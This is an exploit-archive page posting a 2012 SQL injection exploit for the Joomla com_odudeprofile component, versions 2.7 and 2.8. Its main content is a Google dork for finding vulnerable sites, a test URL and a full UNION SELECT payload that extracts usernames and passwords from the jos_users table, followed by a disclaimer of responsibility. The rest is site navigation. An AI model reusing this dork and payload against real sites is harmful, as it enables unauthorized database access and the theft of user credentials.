Joomla Odudeprofile 2.x SQL Injection

Joomla Odudeprofile 2.x SQL Injection: Posted Jul 25, 2012; Authored by Daniel Barragan; Joomla Odudeprofile component version 2.x suffers from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; SHA-256 | 8b5536a92abeb5455576bdcda4e58fb09ea7f7b74b19c495050cdfec88ce5f79; Download | Favorite | View

Joomla Odudeprofile 2.x SQL Injection

______________________________________________________________________________________
 
 Exploit Title: Joomla com_odudeprofile V2.x Exploit

 Google Dork: inurl:index.php?option=com_odudeprofile

 Date: [24-07-2012]

 Author: Daniel Barragan "D4NB4R"

 Twitter: @D4NB4R

 site: https://poisonsecurity.wordpress.com/

 Vendor: https://www.odude.com

 Version: 2.7 & 2.8

 Download: https://www.odude.com/home/profile.html

 License: Non-Commercial
 
 Tested on: [Linux(arch)-Windows(7ultimate)]

______________________________________________________________________________________

  Test:

  https://127.0.0.1/index.php?option=com_odudeprofile&view=search&profession=idtrue%27

    
  Sql:

  https://127.0.0.1/index.php?option=com_odudeprofile&view=search&profession=(SQL) 


      DEMO1:

                     https://example.com/index.php?option=com_odudeprofile&view=search&profession=999999.9'%20union%20all%20select%20 0x31303235343830303536%2C(select%20concat(username,0x3D,password)%20from%20jos_users)%20%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--%20D4NB4R%20


     


Im not responsible for which is given
No me hago responsable del uso que se le de
_______________________________________________________________________________________
Daniel Barragan "D4NB4R"

Top Authors In Last 30 Days

Red Hat 219 files
Ubuntu 55 files
LiquidWorm 20 files
Debian 18 files
Apple 9 files
indoushka 5 files
Gentoo 5 files
Google Security Research 4 files
Alter Prime 3 files
Chokri Hammedi 3 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,158)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,830)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,245)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,969)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

Joomla Odudeprofile 2.x SQL Injection

Joomla Odudeprofile 2.x SQL Injection

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Joomla Odudeprofile 2.x SQL Injection

Share This

Joomla Odudeprofile 2.x SQL Injection

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems